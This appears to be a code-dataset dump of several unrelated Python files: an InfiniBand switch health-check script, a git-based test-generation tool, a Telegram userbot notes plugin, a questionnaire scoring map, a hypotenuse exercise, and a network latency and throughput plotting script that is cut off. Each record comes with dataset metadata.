    return parse_table_hex(out.decode("utf-8").splitlines()[4:-1])
def mlxreg_ext_psu(lid):
    """Read PSU wattage fields from the MSPS register of a switch LID.

    Returns a dict mapping 'watt_<psu>' to an integer wattage.  Only the
    psuN[2] rows are consumed; their value carries a 0x8 prefix which is
    stripped before the hex conversion.
    """
    command = ['mlxreg_ext', '-d', 'lid-{0}'.format(lid),
               '--reg_name', 'MSPS', '--get']
    proc = subprocess.Popen(command, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    out, _ = proc.communicate()
    # PSU Watt rows have 0x8 prepended to the actual value.
    watt_re = re.compile(r'psu(\d)\[2\]\s+\| 0x8(.*)')
    readings = {}
    for row in out.decode("utf-8").splitlines()[4:-1]:
        found = watt_re.match(row)
        if found:
            readings['watt_' + found.group(1)] = int(found.group(2), 16)
    return readings
def mlxreg_ext(lid, register):
    """Fetch an arbitrary register from a switch LID and decode it as ASCII fields."""
    command = ['mlxreg_ext', '-d', 'lid-{0}'.format(lid),
               '--reg_name', register, '--get']
    proc = subprocess.Popen(command, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    out, _ = proc.communicate()
    # Drop the 4-line header and the trailing separator before decoding.
    return parse_table_ascii(out.decode("utf-8").splitlines()[4:-1])
def ascii_field(name):
    """Return True when *name* contains one of the ASCII-valued vendor fields.

    Used to split mlxreg_ext PDDR output rows into text rows (vendor
    strings) and numeric rows.
    """
    # Idiomatic any() over the manual loop-and-return of the original.
    return any(field in name for field in
               ('vendor_name', 'vendor_sn', 'vendor_pn', 'vendor_rev'))
def mlxreg_ext_ports(lid, port_id):
    """Read the PDDR (port diagnostics) register for one port of a switch.

    page_select=0x3 selects the page holding the vendor/cable fields the
    caller consumes.  Rows containing vendor strings are decoded as
    ASCII; every other row is parsed as a hex integer.
    """
    index = 'local_port={},pnat=0x0,page_select=0x3,group_opcode=0x0'
    cmdargs = ['mlxreg_ext', '-d', 'lid-{0}'.format(lid), '--reg_name',
               'PDDR', '--get', '--indexes', index.format(port_id)]
    stdout, stderr = subprocess.Popen(cmdargs,
                                      stdout=subprocess.PIPE,
                                      stderr=subprocess.PIPE).communicate()
    # Drop the 4-line header and the trailing separator line.
    lines = stdout.decode("utf-8").splitlines()[4:-1]
    # ASCII rows and hex rows are parsed separately, then merged.
    info = parse_table_ascii(filter(ascii_field, lines))
    info.update(parse_table_hex(itertools.filterfalse(ascii_field, lines)))
    return info
def guid_to_lid():
    """Map switch GUIDs to LIDs by parsing `ibswitches` output.

    NOTE(review): every output line is assumed to match the pattern; a
    non-matching line would raise AttributeError on ``m.group`` — confirm
    `ibswitches` never emits other lines.
    """
    stdout, stderr = subprocess.Popen(['ibswitches'],
                                      stdout=subprocess.PIPE,
                                      stderr=subprocess.PIPE).communicate()
    lids = {} # store GUID to LID mapping
    for line in stdout.decode("utf-8").splitlines():
        logging.debug('guid_to_lid: %s', line)
        m = re.match(r'.*(0x.*) ports.* lid (\d+)', line)
        lids[m.group(1)] = int(m.group(2))
    return lids
def print_info(info):
    """Write every collected informational line to stdout, one per line."""
    for entry in info:
        print(entry)
# ---- CLI: Nagios-style health check for a Mellanox InfiniBand switch ----
parser = argparse.ArgumentParser(description='')
parser.add_argument("-v", "--verbose", action="store_true",
                    help="increase output verbosity")
parser.add_argument("--guid", help="Switch GUID to check",
                    action="store")
parser.add_argument("--node_name_map", help="Node name map file path",
                    action="store")
parser.add_argument("--name", help="Switch name used in node-name-map",
                    action="store")
parser.add_argument("--fan", help="Check fans", action="store_true")
parser.add_argument("--cable", help="Check cables", action="store_true")
parser.add_argument("--psu", help="Check PSUs", action="store_true")
parser.add_argument("--temp", help="Check temperatures", action="store_true")
args = parser.parse_args()

if args.verbose:
    logging.basicConfig(level=logging.DEBUG)

# Bug fix: argparse 'store' options default to None, never False; the
# original compared against False so this guard could never trigger.
if args.name is None and args.guid is None:
    print('Need to use the GUID or the switch name')
    sys.exit(3)
if args.name:
    if args.node_name_map is None:
        print('node_name_map need to be defined')
        sys.exit(3)

# Build GUID<->name lookup tables from the optional node-name-map file.
guid_name = {}
name_guid = {}
if args.node_name_map:
    with open(args.node_name_map) as f:
        for line in f:
            m = re.match(r'(0x.*) "(.*)"', line)
            if m:
                guid_name[m.group(1)] = m.group(2)
                name_guid[m.group(2)] = m.group(1)

guids = guid_to_lid()
if args.guid:
    # received a GUID, check in node name map
    guid = args.guid
    name = guid_name.get(args.guid, args.guid)
else:
    # Received the name, need to get the GUID from the file
    guid = name_guid[args.name]
    name = args.name
lid = guids[guid]

perfdata = []
criticals = []
warnings = []
info = []

sw = mlxreg_ext(lid, 'MSGI')
info.append('GUID={} LID={} Name={}'.format(guid, lid, name))
info.append('{} PN={} Rev={} SN={}'.format(sw['product_name'],
            sw['part_number'], sw['revision'], sw['serial_number']))

if args.psu:
    psus = mlxreg_ext_psu(lid)
    for i in range(2):
        psu_watt = 'watt_{}'.format(i)
        if psus[psu_watt] < 30:
            criticals.append('PSU{} is down with {}W'.format(
                i, psus[psu_watt]))
        if psus[psu_watt] > 100:
            warnings.append('PSU{} might be alone with {}W'.format(
                i, psus[psu_watt]))
        perfdata.append('PSU{psu}_W={watt};;30:100;;'.format(
            psu=i,
            watt=psus[psu_watt],
        ))
if args.fan:
    for i in range(1, 9):
        fan_info = mlxreg_ext_fans(lid, i)
        rpm = fan_info['rpm']
        if rpm < 4500:
            criticals.append('Fan #{} is too slow, {} RPM'.format(i, rpm))
        elif rpm > 13000:
            criticals.append('Fan #{} is too fast, {} RPM'.format(i, rpm))
        perfdata.append('Fan{fan}_RPM={speed};;{MIN_FAN}:{MAX_FAN};;'.format(
            fan=i,
            speed=rpm,
            MIN_FAN=4500,
            MAX_FAN=13000,
        ))
if args.temp:
    for i in range(1, 7):
        temp_info = mlxreg_ext_temp(lid, i)
        # Register reports tenths of a degree Celsius.
        temperature = temp_info['temperature'] / 10
        if temperature > 45:
            criticals.append('Temperature of #{} is too high, {}C'.format(
                i, temperature))
        perfdata.append('Temperature{sensor}_C={temp};;5:{MAX_TEMP};;'.format(
            sensor=i,
            temp=temperature,
            MAX_TEMP=45,
        ))
if args.cable:
    for i in range(1, 37):
        cable = mlxreg_ext_ports(lid, i)
        # Cable temperature is reported in 1/256 degree units.
        temperature = cable['temperature'] / 256
        if temperature > 70:
            criticals.append('Cable {} is overtemp at {}C > 70C'.format(
                i, temperature))
        info.append('Cable #{}, {} PN={} SN={} Rev={} FW={}, {}M'.format(
            i,
            cable['vendor_name'],
            cable['vendor_pn'],
            cable['vendor_sn'],
            cable['vendor_rev'],
            cable['fw_version'],
            cable['cable_length'])
        )

# Nagios-style exit codes: 2 = critical, 1 = warning, 0 = OK.
# Bug fix: the original used `len(...) > 1`, which silently reported OK
# when exactly one critical or warning was present; it also concatenated
# the criticals and warnings joins with no separator between the groups.
if criticals:
    print('{criticals} | {perfdata}'.format(
        criticals=', '.join(criticals + warnings),
        perfdata=' '.join(perfdata),
    ))
    print_info(info)
    sys.exit(2)
elif warnings:
    print('{warnings} | {perfdata}'.format(
        warnings=', '.join(warnings),
        perfdata=' '.join(perfdata),
    ))
    print_info(info)
    sys.exit(1)
else:
    print('Switch OK | {perfdata}'.format(
        perfdata=' '.join(perfdata),
    ))
    print_info(info)
    sys.exit(0)
|
en
| 0.808937
|
# PSU Watt with 0x8 prependded # store GUID to LID mapping # received a GUID, check in node name map # Received the name, need to get the GUID from the file #{} is too slow, {} RPM'.format(i, rpm)) #{} is too fast, {} RPM'.format(i, rpm)) #{} is too high, {}C'.format( #{}, {} PN={} SN={} Rev={} FW={}, {}M'.format(
| 2.693975
| 3
|
versionizer/versionizer.py
|
Jordan-Gillard/Versionizer
| 0
|
6628487
|
import logging
import os
from typing import Optional, Set
from versionizer.ast_differ import ASTDiffer
from versionizer.ast_handler import ASTHandler
from versionizer.automated_test_executor import AutomatedTestExecutor
from versionizer.automated_test_generator import AutomatedTestGenerator
from versionizer.function_node import FunctionNode
from versionizer.git_handler import GitHandler
from versionizer.parsed_ast_builder import ParsedASTBuilder
class Versionizer:
    """Drive diff-based test generation between two git commits.

    Each Python source file in scope is compared between the two commits
    at the AST level; tests are (optionally) generated for the changed
    functions and (optionally) executed afterwards.
    """

    def __init__(self, project_path: str,
                 first_commit: str,
                 output_path: Optional[str] = None,
                 second_commit: Optional[str] = None,
                 module: str = "",
                 algorithm="WHOLE_SUITE",
                 generate_tests=True,
                 run_tests=True):
        self.project_path = project_path
        self.module = module
        # Default the generated-test output location to the project itself.
        if not output_path:
            self.output_path = project_path
        else:
            self.output_path = output_path
        self.first_commit = first_commit
        self.second_commit = second_commit
        self._validate_algorithm(algorithm)
        self.algorithm = algorithm
        self.generate_tests = generate_tests
        self.run_tests = run_tests
        self.test_generator = AutomatedTestGenerator(project_path, output_path,
                                                     algorithm, module)
        self.git_handler = GitHandler(self.first_commit, self.second_commit)

    @staticmethod
    def _validate_algorithm(algorithm):
        """Raise ValueError unless *algorithm* is a supported search algorithm."""
        # TODO: Should algorithm validation be done in the AutomatedTestGenerator?
        accepted_algorithms = ["RANDOM", "MOSA", "RANDOM_SEARCH", "WHOLE_SUITE"]
        if algorithm not in accepted_algorithms:
            # Bug fix: the original joined the rejected *algorithm* string,
            # listing its characters instead of the accepted algorithm names.
            raise ValueError(
                f"Algorithms must be one of {', '.join(accepted_algorithms)}.")

    def run(self):
        """Run the whole pipeline, restoring the git worktree no matter what."""
        self.git_handler.stash_changes_if_necessary()
        try:
            # Handle working with a single file
            if self.module:
                self._run_for_file(self.project_path, self.module)
            # Handle working with an entire directory
            else:
                for dirpath, dirnames, filenames in os.walk(self.project_path):
                    for file in filenames:
                        if file.endswith(
                                ".py") and "test" not in file and "init" not in file:
                            self._run_for_file(self.project_path, file)
        except Exception as e:
            # Best-effort: log and fall through so the git state is restored.
            logging.error(e)
        finally:
            self.git_handler.return_to_head()
            self.git_handler.pop_stash_if_needed()
        if self.run_tests:
            AutomatedTestExecutor.run_tests(self.project_path)

    def _run_for_file(self, project_path, file):
        """Diff *file* between the two commits and generate tests for the changes."""
        self.git_handler.checkout_first_commit()
        file_path_to_test = os.path.join(project_path, file)
        ast_handler_1 = ASTHandler(file_path_to_test)
        self.git_handler.checkout_second_commit()
        ast_handler_2 = ASTHandler(file_path_to_test)
        ast_differ = ASTDiffer(ast_handler_1, ast_handler_2)
        different_nodes: Set[FunctionNode] = ast_differ.get_changed_function_nodes()
        self.git_handler.checkout_first_commit()
        parsed_ast_builder: ParsedASTBuilder = ParsedASTBuilder(file_path_to_test,
                                                               different_nodes,
                                                               ast_handler_1.get_function_dependents())
        parsed_ast_builder.build_source()
        if self.generate_tests:
            self.test_generator.generate_tests()
            # Preserve the generated test file across the checkout back to HEAD.
            test_file_name = "test_" + file
            test_file_path = os.path.join(project_path, test_file_name)
            with open(test_file_path, "r+") as f:
                test_file_lines = f.readlines()
            self.git_handler.return_to_head()
            with open(test_file_path, "w") as f:
                f.writelines(test_file_lines)
|
import logging
import os
from typing import Optional, Set
from versionizer.ast_differ import ASTDiffer
from versionizer.ast_handler import ASTHandler
from versionizer.automated_test_executor import AutomatedTestExecutor
from versionizer.automated_test_generator import AutomatedTestGenerator
from versionizer.function_node import FunctionNode
from versionizer.git_handler import GitHandler
from versionizer.parsed_ast_builder import ParsedASTBuilder
class Versionizer:
def __init__(self, project_path: str,
first_commit: str,
output_path: Optional[str] = None,
second_commit: Optional[str] = None,
module: str = "",
algorithm="WHOLE_SUITE",
generate_tests=True,
run_tests=True):
self.project_path = project_path
self.module = module
if not output_path:
self.output_path = project_path
else:
self.output_path = output_path
self.first_commit = first_commit
self.second_commit = second_commit
self._validate_algorithm(algorithm)
self.algorithm = algorithm
self.generate_tests = generate_tests
self.run_tests = run_tests
self.test_generator = AutomatedTestGenerator(project_path, output_path,
algorithm, module)
self.git_handler = GitHandler(self.first_commit, self.second_commit)
@staticmethod
def _validate_algorithm(algorithm):
# TODO: Should algorithm validation be done in the AutomatedTestGenerator?
accepted_algorithms = ["RANDOM", "MOSA", "RANDOM_SEARCH", "WHOLE_SUITE"]
if algorithm not in accepted_algorithms:
raise ValueError(f"Algorithms must be one of {', '.join(algorithm)}.")
def run(self):
self.git_handler.stash_changes_if_necessary()
try:
# Handle working with a single file
if self.module:
self._run_for_file(self.project_path, self.module)
# Handle working with an entire directory
else:
for dirpath, dirnames, filenames in os.walk(self.project_path):
for file in filenames:
if file.endswith(
".py") and "test" not in file and "init" not in file:
self._run_for_file(self.project_path, file)
except Exception as e:
logging.error(e)
finally:
self.git_handler.return_to_head()
self.git_handler.pop_stash_if_needed()
if self.run_tests:
AutomatedTestExecutor.run_tests(self.project_path)
def _run_for_file(self, project_path, file):
self.git_handler.checkout_first_commit()
file_path_to_test = os.path.join(project_path, file)
ast_handler_1 = ASTHandler(file_path_to_test)
self.git_handler.checkout_second_commit()
ast_handler_2 = ASTHandler(file_path_to_test)
ast_differ = ASTDiffer(ast_handler_1, ast_handler_2)
different_nodes: Set[FunctionNode] = ast_differ.get_changed_function_nodes()
self.git_handler.checkout_first_commit()
parsed_ast_builder: ParsedASTBuilder = ParsedASTBuilder(file_path_to_test,
different_nodes,
ast_handler_1.get_function_dependents())
parsed_ast_builder.build_source()
if self.generate_tests:
self.test_generator.generate_tests()
test_file_name = "test_" + file
test_file_path = os.path.join(project_path, test_file_name)
with open(test_file_path, "r+") as f:
test_file_lines = f.readlines()
self.git_handler.return_to_head()
with open(test_file_path, "w") as f:
f.writelines(test_file_lines)
|
en
| 0.835364
|
# TODO: Should algorithm validation be done in the AutomatedTestGenerator? # Handle working with a single file # Handle working with an entire directory
| 2.30396
| 2
|
userbot/plugins/notes.py
|
celovek123/SensibleUserbot
| 26
|
6628488
|
<reponame>celovek123/SensibleUserbot<filename>userbot/plugins/notes.py<gh_stars>10-100
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""notes
Available Commands:
.save
.listnotes
.clear"""
from telethon import events, utils
from telethon.tl import types
from userbot.plugins.sql_helper.notes_sql import get_notes, add_note, remove_note, get_all_notes
from userbot.utils import admin_cmd
TYPE_TEXT = 0
TYPE_PHOTO = 1
TYPE_DOCUMENT = 2
@borg.on(events.NewMessage(pattern=r'\#(\S+)', outgoing=True))
async def on_note(event):
    """Replace an outgoing '#<name>' message with the saved note of that name.

    Text notes are sent as-is; photo/document notes rebuild the Telegram
    media handle from the stored id / access-hash / file-reference.
    """
    name = event.pattern_match.group(1)
    note = get_notes(name)
    if note:
        if note.note_type == TYPE_PHOTO:
            media = types.InputPhoto(
                int(note.media_id),
                int(note.media_access_hash),
                note.media_file_reference
            )
        elif note.note_type == TYPE_DOCUMENT:
            media = types.InputDocument(
                int(note.media_id),
                int(note.media_access_hash),
                note.media_file_reference
            )
        else:
            # TYPE_TEXT notes carry no media payload.
            media = None
        message_id = event.message.id
        if event.reply_to_msg_id:
            # Keep the reply chain: answer the message the trigger replied to.
            message_id = event.reply_to_msg_id
        await borg.send_message(
            event.chat_id,
            note.reply,
            reply_to=message_id,
            file=media
        )
        # Remove the '#name' trigger message itself.
        await event.delete()
@borg.on(admin_cmd("save (.*)"))
async def on_note_save(event):
    """Save the replied-to message as a note under the given name.

    Text, photo and document messages are supported; for media the
    Telegram id / access-hash / file-reference triple is persisted so
    the note can be resent later without re-uploading.
    """
    name = event.pattern_match.group(1)
    msg = await event.get_reply_message()
    if msg:
        note = {'type': TYPE_TEXT, 'text': msg.message or ''}
        if msg.media:
            media = None
            if isinstance(msg.media, types.MessageMediaPhoto):
                media = utils.get_input_photo(msg.media.photo)
                note['type'] = TYPE_PHOTO
            elif isinstance(msg.media, types.MessageMediaDocument):
                media = utils.get_input_document(msg.media.document)
                note['type'] = TYPE_DOCUMENT
            if media:
                note['id'] = media.id
                note['hash'] = media.access_hash
                note['fr'] = media.file_reference
        # Media keys may be absent for plain-text notes: .get() passes None.
        add_note(name, note['text'], note['type'], note.get('id'), note.get('hash'), note.get('fr'))
        await event.edit("note {name} saved successfully. Get it with #{name}".format(name=name))
    else:
        await event.edit("Reply to a message with `notes keyword` to save the note")
@borg.on(admin_cmd("listnotes"))
async def on_note_list(event):
    """List all saved note names, inline or as a file when too long.

    NOTE(review): ``io`` and ``Config`` are referenced below but never
    imported in this module — presumably injected by the userbot loader
    alongside ``borg``; confirm, otherwise the oversize branch raises
    NameError.
    """
    all_notes = get_all_notes()
    OUT_STR = "Available notes:\n"
    if len(all_notes) > 0:
        for a_note in all_notes:
            OUT_STR += f"✔ #{a_note.note} \n"
    else:
        OUT_STR = "No notes. Start Saving using `.notes`"
    if len(OUT_STR) > Config.MAX_MESSAGE_SIZE_LIMIT:
        # Too long for one Telegram message: upload the list as a file.
        with io.BytesIO(str.encode(OUT_STR)) as out_file:
            out_file.name = "notes.text"
            await borg.send_file(
                event.chat_id,
                out_file,
                force_document=True,
                allow_cache=False,
                caption="Available notes",
                reply_to=event
            )
            await event.delete()
    else:
        await event.edit(OUT_STR)
@borg.on(admin_cmd("clear (\S+)"))
async def on_note_delete(event):
    """Delete the note with the given name and confirm by editing the command."""
    name = event.pattern_match.group(1)
    remove_note(name)
    await event.edit("note #{} deleted successfully".format(name))
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""notes
Available Commands:
.save
.listnotes
.clear"""
from telethon import events, utils
from telethon.tl import types
from userbot.plugins.sql_helper.notes_sql import get_notes, add_note, remove_note, get_all_notes
from userbot.utils import admin_cmd
TYPE_TEXT = 0
TYPE_PHOTO = 1
TYPE_DOCUMENT = 2
@borg.on(events.NewMessage(pattern=r'\#(\S+)', outgoing=True))
async def on_note(event):
name = event.pattern_match.group(1)
note = get_notes(name)
if note:
if note.note_type == TYPE_PHOTO:
media = types.InputPhoto(
int(note.media_id),
int(note.media_access_hash),
note.media_file_reference
)
elif note.note_type == TYPE_DOCUMENT:
media = types.InputDocument(
int(note.media_id),
int(note.media_access_hash),
note.media_file_reference
)
else:
media = None
message_id = event.message.id
if event.reply_to_msg_id:
message_id = event.reply_to_msg_id
await borg.send_message(
event.chat_id,
note.reply,
reply_to=message_id,
file=media
)
await event.delete()
@borg.on(admin_cmd("save (.*)"))
async def on_note_save(event):
name = event.pattern_match.group(1)
msg = await event.get_reply_message()
if msg:
note = {'type': TYPE_TEXT, 'text': msg.message or ''}
if msg.media:
media = None
if isinstance(msg.media, types.MessageMediaPhoto):
media = utils.get_input_photo(msg.media.photo)
note['type'] = TYPE_PHOTO
elif isinstance(msg.media, types.MessageMediaDocument):
media = utils.get_input_document(msg.media.document)
note['type'] = TYPE_DOCUMENT
if media:
note['id'] = media.id
note['hash'] = media.access_hash
note['fr'] = media.file_reference
add_note(name, note['text'], note['type'], note.get('id'), note.get('hash'), note.get('fr'))
await event.edit("note {name} saved successfully. Get it with #{name}".format(name=name))
else:
await event.edit("Reply to a message with `notes keyword` to save the note")
@borg.on(admin_cmd("listnotes"))
async def on_note_list(event):
all_notes = get_all_notes()
OUT_STR = "Available notes:\n"
if len(all_notes) > 0:
for a_note in all_notes:
OUT_STR += f"✔ #{a_note.note} \n"
else:
OUT_STR = "No notes. Start Saving using `.notes`"
if len(OUT_STR) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUT_STR)) as out_file:
out_file.name = "notes.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption="Available notes",
reply_to=event
)
await event.delete()
else:
await event.edit(OUT_STR)
@borg.on(admin_cmd("clear (\S+)"))
async def on_note_delete(event):
name = event.pattern_match.group(1)
remove_note(name)
await event.edit("note #{} deleted successfully".format(name))
|
en
| 0.725002
|
# This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. notes Available Commands: .save .listnotes .clear #(\S+)', outgoing=True)) #{name}".format(name=name)) #{a_note.note} \n" #{} deleted successfully".format(name))
| 2.158068
| 2
|
scoring/dictionary/IUS93.py
|
majazeh/risloo-samples
| 0
|
6628489
|
<reponame>majazeh/risloo-samples<gh_stars>0
# Factor labels for the IUS-93 questionnaire scoring map.
f1 = 'factor_1'
f2 = 'factor_2'
# Number of answer options per question.
option_numbers = 5
factors_names = ('raw', f1, f2)
# Question numbers belonging to each factor.
_f1_items = (1, 2, 3, 9, 12, 13, 14, 15, 16, 17, 20, 22, 23, 24, 25)
_f2_items = (4, 5, 6, 7, 8, 10, 11, 18, 19, 21, 26, 27)
# Question-number -> tuple of factor names it contributes to.
factors = {q: (f1,) for q in _f1_items}
factors.update({q: (f2,) for q in _f2_items})
|
f1 = 'factor_1'
f2 = 'factor_2'
option_numbers = 5
factors_names = ('raw',f1,f2)
factors = {
1: (f1,)
, 2: (f1,)
, 3: (f1,)
, 9: (f1,)
, 12: (f1,)
, 13: (f1,)
, 14: (f1,)
, 15: (f1,)
, 16: (f1,)
, 17: (f1,)
, 20: (f1,)
, 22: (f1,)
, 23: (f1,)
, 24: (f1,)
, 25: (f1,)
, 4: (f2,)
, 5: (f2,)
, 6: (f2,)
, 7: (f2,)
, 8: (f2,)
, 10: (f2,)
, 11: (f2,)
, 18: (f2,)
, 19: (f2,)
, 21: (f2,)
, 26: (f2,)
, 27: (f2,)
}
|
none
| 1
| 1.736368
| 2
|
|
02_Utilizando_Modulos/17.py
|
TheCarvalho/Curso-Em-Video-Python
| 0
|
6628490
|
<gh_stars>0
# *ex 17: read the opposite and adjacent legs of a right triangle and
# print the hypotenuse (translated from the original Portuguese comment).
from math import hypot
opos = float(input('Me manda o cateto oposto: '))  # opposite leg
adj = float(input('Agora me manda o adjacente: '))  # adjacent leg
print('A hipotenusa é {}'.format(hypot(opos, adj)))
|
# *ex 17 = Faça um programa que leia o comprimento do cateto oposto e do cateto adjacente de um triangulo retangulo. calculo e mostre o comprimento da hiputenusa
from math import hypot
opos = float(input('Me manda o cateto oposto: '))
adj = float(input('Agora me manda o adjacente: '))
print('A hipotenusa é {}'.format(hypot(opos, adj)))
|
pt
| 0.730475
|
# *ex 17 = Faça um programa que leia o comprimento do cateto oposto e do cateto adjacente de um triangulo retangulo. calculo e mostre o comprimento da hiputenusa
| 3.945441
| 4
|
lanyue_thesis/rate_limiter/raw_data/dctcp_benchmark/RTT_threshold/1000mbps/plot.py
|
keqhe/phd_thesis
| 2
|
6628491
|
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
from pylab import *
import matplotlib.gridspec as gridspec
#import matplotlib
matplotlib.rcParams['ps.useafm'] = True
matplotlib.rcParams['pdf.use14corefonts'] = True
matplotlib.rcParams['text.usetex'] = True
import re
import os
#====================param================================
FIGSIZE = (8, 4)
FIGNAME='figure.pdf'
TPUT_YLIM = (0, 1000)
LATE_YLIM = (0, 500)
MARKERS = ['o','v','^','s','*','+','x']
COLORS = ["k", "c", "g", "b", "m", "r", "y"]
PATTERNS = ['ko','cv','g^','bs','m*','r+','yx']
LINEPATTERNS = ['ko-','cv-','g^-','bs-','m*-','r+-','yx--']
#====================param================================
def ShowAndConfigParam():
    """Set global matplotlib font params and echo the effective config.

    NOTE(review): the ``print`` statements make this a Python 2 script.
    """
    mpl.rcParams['font.size']=14
    mpl.rcParams['legend.fontsize']='small'
    print "============ configurations ================="
    print "default configuration file: %s" % mpl.matplotlib_fname()
    print "default font size: %s" % mpl.rcParams['font.size']
    print "legend fontsize: %s" % mpl.rcParams['legend.fontsize']
    print "============ configurations ================="
def GetCDFData(fileName):
    """Parse a sockperf log into a {percentile-label: latency} dict.

    Percentile values are doubled before being returned (presumably
    one-way -> round-trip — TODO confirm intent).  A per-sample CDF is
    also computed but currently unused: only the percentile dict is
    returned (see the commented-out return below).
    """
    percentile_re_1 = re.compile(r"sockperf: ---> <(?P<max_or_min>.*)> observation =\s+(?P<value>\S+)")
    percentile_re_2 = re.compile(r"sockperf: ---> percentile (?P<percent>.*) =\s+(?P<value>\S+)")
    sample_re = re.compile(r"(?P<snd>\d+.\d*), (?P<rcv>\d+.\d*)")
    percentiles = []
    samples = []
    f = open(fileName, 'r')
    for line in f.readlines():
        match = percentile_re_1.match(line)
        if match!= None:
            # MIN/MAX observation lines.
            percentiles.append( ( float(match.group("value")), match.group("max_or_min") ) )
            continue
        match = percentile_re_2.match(line)
        if match!=None:
            # Regular percentile lines keyed by their percent label.
            percentiles.append( ( float(match.group("value")), match.group("percent") ) )
            continue
        match = sample_re.match(line)
        if match != None:
            # Per-sample latency = receive - send timestamp, scaled to us.
            latency = float(match.group("rcv")) - float(match.group("snd"))
            samples.append(latency*1000000)
    f.close()
    # Re-key as {label: doubled value}.
    percentiles = {p[1]:(p[0]*2) for p in percentiles}
    samples.sort()
    samples = (samples, [float(i)/len(samples) for i in range(len(samples))])
    return percentiles
    #return (percentiles, samples)
def GetTputData(fileName): # total
    """Return the summary throughput (in Mbits/sec) from an iperf log.

    Per-second interval lines (t2 - t1 == 1) are skipped; the first
    line covering a longer interval is taken as the run summary.
    Gbits/sec values are scaled to Mbits.  Returns None implicitly when
    no summary line is found.
    """
    Mbits_re = re.compile(r".*\s+(?P<t1>\S+)-\s*(?P<t2>\S+)\s+sec.*\s+(?P<value>\S+)\s*Mbits/sec")
    Gbits_re = re.compile(r".*\s+(?P<t1>\S+)-\s*(?P<t2>\S+)\s+sec.*\s+(?P<value>\S+)\s*Gbits/sec")
    tput = []
    f = open(fileName, 'r')
    for line in f.readlines():
        # print line
        match = Mbits_re.match(line)
        if match!=None:
            t1 = float(match.group("t1"))
            t2 = float(match.group("t2"))
            if t2-t1!=1:
                # Not a 1-second interval line -> overall summary.
                return float(match.group("value"))
        match = Gbits_re.match(line)
        if match!=None:
            # print 'match Gbits'
            t1 = float(match.group("t1"))
            t2 = float(match.group("t2"))
            if t2-t1!=1:
                # Summary line in Gbits/sec: normalize to Mbits.
                return float(match.group("value"))*1000
def GetThresholds():
    """Collect sorted threshold values from iperf<threshold>.log filenames in cwd."""
    found = [
        int(name[5:].split('.')[0])
        for name in os.listdir('.')
        if name.startswith('iperf')
    ]
    return sorted(found)
def Plot():
    """Render RTT percentiles and throughput vs. threshold into figure.pdf.

    For every threshold discovered in the current directory, reads the
    matching sockperf<t>.log / iperf<t>.log pair; RTT percentile curves
    go on the left axis, throughput on a twin right axis.
    """
    thresholds = GetThresholds() #range(0, 30001, 1000)
    # x axis is labelled in kB below, hence the /1000.
    xs = [ t/1000 for t in thresholds]
    lines =[ [], [], [], [], [], [], []]
    legends = [ 'MIN', '0.25', '0.5', '0.75', '0.99', '0.999', 'tput' ]
    for t in thresholds:
        sockfile = 'sockperf%d.log' % t
        percentiles = GetCDFData(sockfile)
        lines[0].append(percentiles['MIN'])
        lines[1].append(percentiles['25.000'])
        lines[2].append(percentiles['50.000'])
        lines[3].append(percentiles['75.000'])
        lines[4].append(percentiles['99.000'])
        lines[5].append(percentiles['99.900'])
        iperffile = 'iperf%d.log' % t
        tput = GetTputData(iperffile)
        lines[6].append(tput)
    figName=FIGNAME
    fig, ax = plt.subplots(figsize=FIGSIZE)
    patterns=[]
    # The six latency series share the left axis.
    for i in range(6):
        p, = ax.plot(xs, lines[i], LINEPATTERNS[i], label=legends[i])
        patterns.append(p)
    # Throughput uses a secondary y axis sharing the same x.
    ax2 = ax.twinx()
    p, = ax2.plot(xs, lines[6], LINEPATTERNS[6], label=legends[6])
    patterns.append(p)
    ax.set_ylabel('RTT (us)')
    ax2.set_ylabel('Throughput (Mbps)')
    ax2.set_ylim(TPUT_YLIM)
    ax.set_xlabel('Threshold (kB)')
    ax.set_ylim(LATE_YLIM)
    ax.yaxis.grid(True, linestyle='--')
    plt.legend(patterns, [l.get_label() for l in patterns], ncol=1, loc='upper left', framealpha=1)
    plt.tight_layout(rect=(0, 0, 1, 1))
    pp = PdfPages(figName)
    pp.savefig()
    pp.close()
# Script entry point: render figure.pdf from the logs in the current directory.
if __name__ == '__main__':
    Plot()
|
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
from pylab import *
import matplotlib.gridspec as gridspec
#import matplotlib
matplotlib.rcParams['ps.useafm'] = True
matplotlib.rcParams['pdf.use14corefonts'] = True
matplotlib.rcParams['text.usetex'] = True
import re
import os
#====================param================================
FIGSIZE = (8, 4)
FIGNAME='figure.pdf'
TPUT_YLIM = (0, 1000)
LATE_YLIM = (0, 500)
MARKERS = ['o','v','^','s','*','+','x']
COLORS = ["k", "c", "g", "b", "m", "r", "y"]
PATTERNS = ['ko','cv','g^','bs','m*','r+','yx']
LINEPATTERNS = ['ko-','cv-','g^-','bs-','m*-','r+-','yx--']
#====================param================================
def ShowAndConfigParam():
mpl.rcParams['font.size']=14
mpl.rcParams['legend.fontsize']='small'
print "============ configurations ================="
print "default configuration file: %s" % mpl.matplotlib_fname()
print "default font size: %s" % mpl.rcParams['font.size']
print "legend fontsize: %s" % mpl.rcParams['legend.fontsize']
print "============ configurations ================="
def GetCDFData(fileName):
percentile_re_1 = re.compile(r"sockperf: ---> <(?P<max_or_min>.*)> observation =\s+(?P<value>\S+)")
percentile_re_2 = re.compile(r"sockperf: ---> percentile (?P<percent>.*) =\s+(?P<value>\S+)")
sample_re = re.compile(r"(?P<snd>\d+.\d*), (?P<rcv>\d+.\d*)")
percentiles = []
samples = []
f = open(fileName, 'r')
for line in f.readlines():
match = percentile_re_1.match(line)
if match!= None:
percentiles.append( ( float(match.group("value")), match.group("max_or_min") ) )
continue
match = percentile_re_2.match(line)
if match!=None:
